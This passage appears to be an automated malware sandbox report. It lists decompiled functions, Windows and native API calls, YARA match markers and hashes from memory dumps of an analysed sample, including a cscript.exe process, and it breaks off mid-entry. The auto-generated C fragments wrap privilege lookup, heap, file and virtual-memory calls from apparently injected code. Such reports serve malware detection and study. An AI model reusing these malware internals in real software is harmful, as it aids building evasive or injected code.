                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0108F192,0108F192,0000003C,00000000,?,01089D35), ref: 0109A3C0
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Offset: 01080000, based on PE: true
                                                        • Associated: 0000000A.00000002.821707875.0000000001080000.00000002.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821764395.000000000109E000.00000040.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821781373.000000000109F000.00000020.00020000.sdmp Download File
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: e151095a2b81fbf270d50d4154850c8daf93b1663239ea63179aa831bb7c5315
                                                        • Instruction ID: bc6a5dc0818151c007d25376cf5cc1ff4193fcd6614000e98e4b303777609b63
                                                        • Opcode Fuzzy Hash: e151095a2b81fbf270d50d4154850c8daf93b1663239ea63179aa831bb7c5315
                                                        • Instruction Fuzzy Hash: 05E0E5B1208A406BE710DB19DC84FD77F94CF86220F04C99DEDD81B103C434A804C7B0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0109A222, Relevance: 1.5, APIs: 1, Instructions: 25memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 65%
                                                        			E0109A222(signed int __eax, void* __esi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t24;
				void* _t30;
				signed int _t32;

				asm("aad 0x93");
				_t27 = __eax *  *[es:ecx] >> 0x20;
				_t32 = __eax *  *[es:ecx];
				asm("sbb al, [edi]");
				 *((intOrPtr*)(_t32 + 0x43 + _t27 * 4)) =  *((intOrPtr*)(_t32 + 0x43 + (__eax *  *[es:ecx] >> 0x20) * 4)) + 0x8bec8b55;
				_t21 = _a4;
				_push(_t32);
				_t14 = _t21 + 0xc74; // 0xc74
				E0109AB20(_t30, _a4, _t14,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t24 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t24;
			}






                                                        0x0109a222
                                                        0x0109a224
                                                        0x0109a229
                                                        0x0109a22a
                                                        0x0109a22c
                                                        0x0109a233
                                                        0x0109a239
                                                        0x0109a23f
                                                        0x0109a247
                                                        0x0109a25d
                                                        0x0109a261

                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,01089CC3,?,?,01089CC3,00000060,00000000,00000000,?,?,01089CC3,?,00000000), ref: 0109A25D
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Offset: 01080000, based on PE: true
                                                        • Associated: 0000000A.00000002.821707875.0000000001080000.00000002.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821764395.000000000109E000.00000040.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821781373.000000000109F000.00000020.00020000.sdmp Download File
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: 526b94783186e8d3bdf8a34529ba8b16a7c3bb539fd28f01e1691167f5780fdb
                                                        • Instruction ID: 6db85658d8fdb35583192293745354de282f3b53e8eedc4e2ff2ea33f8e3da4e
                                                        • Opcode Fuzzy Hash: 526b94783186e8d3bdf8a34529ba8b16a7c3bb539fd28f01e1691167f5780fdb
                                                        • Instruction Fuzzy Hash: 20E068B42042824FDB11EF78A8D08A77B91EF82304314494ED8C84B607C230D92ACBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0109A1F0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0109A1F0(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0109AB20(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                        0x0109a207
                                                        0x0109a21d
                                                        0x0109a221

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(010944F6,?,01094C6F,01094C6F,?,010944F6,?,?,?,?,?,00000000,01089CC3,?), ref: 0109A21D
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Offset: 01080000, based on PE: true
                                                        • Associated: 0000000A.00000002.821707875.0000000001080000.00000002.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821764395.000000000109E000.00000040.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821781373.000000000109F000.00000020.00020000.sdmp Download File
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                        • Instruction ID: 9c91c33ee07213847282b795538fcd16e11391e6fee8c4ea1408422413d64ab0
                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                        • Instruction Fuzzy Hash: FBE012B1200208ABDB14EF99DC40EA777ADAF88650F118559BE185B242C630F9108BB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0109A390, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0109A390(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				intOrPtr* _t8;
				int _t10;
				void* _t15;

				_t8 = E0109AB20(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				 *_t8 =  *_t8 + _t8;
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}






                                                        0x0109a3aa
                                                        0x0109a3ad
                                                        0x0109a3c0
                                                        0x0109a3c4

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0108F192,0108F192,0000003C,00000000,?,01089D35), ref: 0109A3C0
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Offset: 01080000, based on PE: true
                                                        • Associated: 0000000A.00000002.821707875.0000000001080000.00000002.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821764395.000000000109E000.00000040.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821781373.000000000109F000.00000020.00020000.sdmp Download File
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                        • Instruction ID: 8a007edd0757b3ebf1be78cbae1f4ba646d1ad5b4827390b162e64e84b4e0365
                                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                        • Instruction Fuzzy Hash: A3E01AB1200208ABDB10DF49DC84FE737ADAF88650F018555BE0857241C930E8108BF5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0109A230, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0109A230(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0109AB20(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                        0x0109a23f
                                                        0x0109a247
                                                        0x0109a25d
                                                        0x0109a261

                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,01089CC3,?,?,01089CC3,00000060,00000000,00000000,?,?,01089CC3,?,00000000), ref: 0109A25D
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Offset: 01080000, based on PE: true
                                                        • Associated: 0000000A.00000002.821707875.0000000001080000.00000002.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821764395.000000000109E000.00000040.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821781373.000000000109F000.00000020.00020000.sdmp Download File
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                        • Instruction ID: 697b62156bdca69d794874bcc99b026faddae524aa19b40867b37ee9395366e0
                                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                        • Instruction Fuzzy Hash: 38E012B1200208ABDB18EF99DC48EA777ADAF88650F018559BE185B242C630E9108AB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0109A270, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0109A270(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0109AB20(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                        0x0109a273
                                                        0x0109a28a
                                                        0x0109a298

                                                        APIs
                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0109A298
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Offset: 01080000, based on PE: true
                                                        • Associated: 0000000A.00000002.821707875.0000000001080000.00000002.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821764395.000000000109E000.00000040.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821781373.000000000109F000.00000020.00020000.sdmp Download File
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                        • Instruction ID: eb57904fe695b06529428f3691ca37dde676b21048733ceccf9caca913e69e3e
                                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                        • Instruction Fuzzy Hash: BFD01772600218BBDA20EB98DC95FD777ACDF486A0F0184A5BA5C6B242C531BA008BE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0109A3C5, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 37%
                                                        			E0109A3C5(intOrPtr* __eax, void* __esi) {
				int _t6;
				void* _t12;

				asm("cmc");
				asm("aas");
				asm("sti");
				 *__eax =  *__eax + __eax;
				_t6 = LookupPrivilegeValueW( *(_t12 + 0xc),  *(_t12 + 0x10),  *(_t12 + 0x14)); // executed
				return _t6;
			}





                                                        0x0109a3c5
                                                        0x0109a3c6
                                                        0x0109a3c7
                                                        0x0109a3ad
                                                        0x0109a3c0
                                                        0x0109a3c4

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0108F192,0108F192,0000003C,00000000,?,01089D35), ref: 0109A3C0
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Offset: 01080000, based on PE: true
                                                        • Associated: 0000000A.00000002.821707875.0000000001080000.00000002.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821764395.000000000109E000.00000040.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821781373.000000000109F000.00000020.00020000.sdmp Download File
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 74aa864b63d167c4d3501b3b175f067a5d55d8883e1ac6d785d3a7e7fe6958f6
                                                        • Instruction ID: a0166f8d38dbd6979381017da0801fcc5488345025b0545af54ad69f4cadf729
                                                        • Opcode Fuzzy Hash: 74aa864b63d167c4d3501b3b175f067a5d55d8883e1ac6d785d3a7e7fe6958f6
                                                        • Instruction Fuzzy Hash: 8ED0C9B5204244AFDB04DF58E8608AB7369EFC8215715C656FC8983206D131D9258AB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 0109727D, Relevance: .0, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Offset: 01080000, based on PE: true
                                                        • Associated: 0000000A.00000002.821707875.0000000001080000.00000002.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821764395.000000000109E000.00000040.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821781373.000000000109F000.00000020.00020000.sdmp Download File
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: db5b35e52234c74a5ce94f012968e38b90e969a360c8af007e0e521abb468a68
                                                        • Instruction ID: b46e09aae378f5173feb7026ee4a1bc6067846a231d7195f11469829d014ac17
                                                        • Opcode Fuzzy Hash: db5b35e52234c74a5ce94f012968e38b90e969a360c8af007e0e521abb468a68
                                                        • Instruction Fuzzy Hash: 04E06826B490198EC730EFBDF8500F4FBA0E546261F642AC2C8C45B211CD2680004B44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01097D7B, Relevance: .0, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 37%
                                                        			E01097D7B(void* __eax, void* __ebx, void* __edx, void* __esi) {

				asm("movsb");
				return __esi;
			}



                                                        0x01097d7e
                                                        0x01097d89

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Offset: 01080000, based on PE: true
                                                        • Associated: 0000000A.00000002.821707875.0000000001080000.00000002.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821764395.000000000109E000.00000040.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821781373.000000000109F000.00000020.00020000.sdmp Download File
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bce25eddea354172be14e85d9d476cce7631b298b385297083b3d363ea62799e
                                                        • Instruction ID: c457306a74b2c71d024e4f8c5d284eafce79f36b9d5037721dd46c84afb83131
                                                        • Opcode Fuzzy Hash: bce25eddea354172be14e85d9d476cce7631b298b385297083b3d363ea62799e
                                                        • Instruction Fuzzy Hash: C6B01123F8A828008020AC8E38800B8F3A0E0EB233F8033E3CE0CFB0008002C82A00CC
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Analysis Process: cscript.exe PID: 6000 Parent PID: 3424 cscript.exeCOMMON

                                                        Executed Functions

                                                        Function 031C9F1A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43filenativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,031C4B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,031C4B77,007A002E,00000000,00000060,00000000,00000000), ref: 031C9F6D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Offset: 031B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID: .z`
                                                        • API String ID: 823142352-1441809116
                                                        • Opcode ID: 3ed1951e96ef95b6a6601b53316f604e79009f262593ad4ea504c746e2604d13
                                                        • Instruction ID: 4520387fd831a866972b8eb2f3691e4bb13bf217188ba5c7695dd532a556f6ae
                                                        • Opcode Fuzzy Hash: 3ed1951e96ef95b6a6601b53316f604e79009f262593ad4ea504c746e2604d13
                                                        • Instruction Fuzzy Hash: AD01A4B2214218AFCB08DF88DC94EEB77ADBF8C754F158249FA1D97240D630E951CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 031C9F20, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,031C4B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,031C4B77,007A002E,00000000,00000060,00000000,00000000), ref: 031C9F6D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Offset: 031B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID: .z`
                                                        • API String ID: 823142352-1441809116
                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                        • Instruction ID: 6cf59ccda19e7e72dec58a99896787e53f38738a1f49137a99a751c05fed0718
                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                        • Instruction Fuzzy Hash: FAF0BDB2210208ABCB08CF88DC94EEB77ADAF8C754F158248BA0D97240C630E8118BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 031C9FCA, Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtReadFile.NTDLL(031C4D32,5EB6522D,FFFFFFFF,031C49F1,?,?,031C4D32,?,031C49F1,FFFFFFFF,5EB6522D,031C4D32,?,00000000), ref: 031CA015
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Offset: 031B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 1e5cdbd6c9df7f575de7847cb715386c3a453e7ff5e0d791887eaa8c6e97483e
                                                        • Instruction ID: 972669233de14b596ea026917a3a5eebf8551b73a26737e6e98bc37d0e3f42d0
                                                        • Opcode Fuzzy Hash: 1e5cdbd6c9df7f575de7847cb715386c3a453e7ff5e0d791887eaa8c6e97483e
                                                        • Instruction Fuzzy Hash: A4F0E7B2200108AFCB14DF99DC91EEB77A9EF8C754F118248FA0D97240C630E815CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 031C9FD0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtReadFile.NTDLL(031C4D32,5EB6522D,FFFFFFFF,031C49F1,?,?,031C4D32,?,031C49F1,FFFFFFFF,5EB6522D,031C4D32,?,00000000), ref: 031CA015
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Offset: 031B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                        • Instruction ID: 8b6ce596473ce45d5256b0db773268956a2e5a322eae51e41aeb34ffa973f4af
                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                        • Instruction Fuzzy Hash: E2F0A4B6210208ABCB14DF89DC90EEB77ADAF8C754F158249BA1D97241D630E8118BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 031CA0FA, Relevance: 1.5, APIs: 1, Instructions: 34memorynativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,031B2D11,00002000,00003000,00000004), ref: 031CA139
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Offset: 031B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: e29334c3a592716c68ed36a3ce379a57337003b8880b9006118a3413d02e9409
                                                        • Instruction ID: f46429f009eeafdc55ef2e1218f50d5c28758f003153f33fe83fc371b863a7a7
                                                        • Opcode Fuzzy Hash: e29334c3a592716c68ed36a3ce379a57337003b8880b9006118a3413d02e9409
                                                        • Instruction Fuzzy Hash: 09F01CB6210208ABDB14DF88DC91FE777ADBF8C750F118249BE189B241C630E911CBE0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 031CA100, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,031B2D11,00002000,00003000,00000004), ref: 031CA139
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Offset: 031B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                        • Instruction ID: fd786b3cb515055eb5487a42bb3170bc80e1f275543f47c6fd99b1b5a9314301
                                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                        • Instruction Fuzzy Hash: B1F015B6210208ABCB14DF89DC80EAB77ADAF8C650F118249BE0897241C630F810CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 031CA050, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtClose.NTDLL(031C4D10,?,?,031C4D10,00000000,FFFFFFFF), ref: 031CA075
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Offset: 031B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                        • Instruction ID: 154b5854f48f3cde636347f6a84ef48856e9ccfb9e536fd65a86495beed230f9
                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                        • Instruction Fuzzy Hash: 53D01776210318ABD710EB98DC85FA77BADEF48660F154599BA189B242C630FA0087E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 031CA04C, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtClose.NTDLL(031C4D10,?,?,031C4D10,00000000,FFFFFFFF), ref: 031CA075
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Offset: 031B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: 70ffbefb60e2ae8a679b52bd9ab9c0853339893cf51a29a6483cd9ac056dfa2f
                                                        • Instruction ID: 4dcbab7b8f04842b9dbbfef5aaeb2d80350dcb05db42205beeb74046984c94ff
                                                        • Opcode Fuzzy Hash: 70ffbefb60e2ae8a679b52bd9ab9c0853339893cf51a29a6483cd9ac056dfa2f
                                                        • Instruction Fuzzy Hash: 9AD01776610214ABD714EF98DC85FA77B69EF88760F154599BA189F242C630EA008BE0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048D95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 300e9101d76a66a796c64beedc9466ccab4971b3aee262b9c558cebbbbcd8501
                                                        • Instruction ID: fd1c65b15c13b32a926ee07ac61384b69ebb078880222b65f685f5c486ed144e
                                                        • Opcode Fuzzy Hash: 300e9101d76a66a796c64beedc9466ccab4971b3aee262b9c558cebbbbcd8501
                                                        • Instruction Fuzzy Hash: D09002A1202001036105715B4414636404A97E1285B51C521E60096A0DC565D8997165
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048D9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: f36a56477763deff63dd47fceef4e761227996f9b196287a0c87fa2c5d553e73
                                                        • Instruction ID: 97c226ec06d7f3aff986b4ed35542bcc10e370d01b70b6b62efc4363478f8844
                                                        • Opcode Fuzzy Hash: f36a56477763deff63dd47fceef4e761227996f9b196287a0c87fa2c5d553e73
                                                        • Instruction Fuzzy Hash: 18900265211001032105A55B0704527008697D63D5351C521F600A660CD661D8696161
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048D96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 5726b6f8270da00f2cb73065ee422cfdd4980a68a21eaade0f7ee6f94b9fe789
                                                        • Instruction ID: b5a734e7f479f181d9eb0a3536b53ebf106c108a13b0f7aef2447aa07bad6dcf
                                                        • Opcode Fuzzy Hash: 5726b6f8270da00f2cb73065ee422cfdd4980a68a21eaade0f7ee6f94b9fe789
                                                        • Instruction Fuzzy Hash: 3E90027120100942F100615B4404B66004597E1385F51C516A5119764D8655D8597561
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048D96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: e3d0419c47af437b8b414e0779cdf1d71b74e793df6f1608a75d646f229a358a
                                                        • Instruction ID: 7c1cb988df14bed469e5ce6a4778dc858b2767c1c13d6dacec5b6ca1eb11fab9
                                                        • Opcode Fuzzy Hash: e3d0419c47af437b8b414e0779cdf1d71b74e793df6f1608a75d646f229a358a
                                                        • Instruction Fuzzy Hash: C690027120108902F110615B840476A004597D1385F55C911A9419768D86D5D8997161
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048D9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: edb211c4662f1a3a024056041c2da3ec9e70233a229ce5d086378330f842d80f
                                                        • Instruction ID: 4d4761ffd5192d665209bf347a5c0d571bef374d519eba4c52767c5eb62d50b9
                                                        • Opcode Fuzzy Hash: edb211c4662f1a3a024056041c2da3ec9e70233a229ce5d086378330f842d80f
                                                        • Instruction Fuzzy Hash: 2A90027120504942F140715B4404A66005597D1389F51C511A50597A4D9665DD5DB6A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048D9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
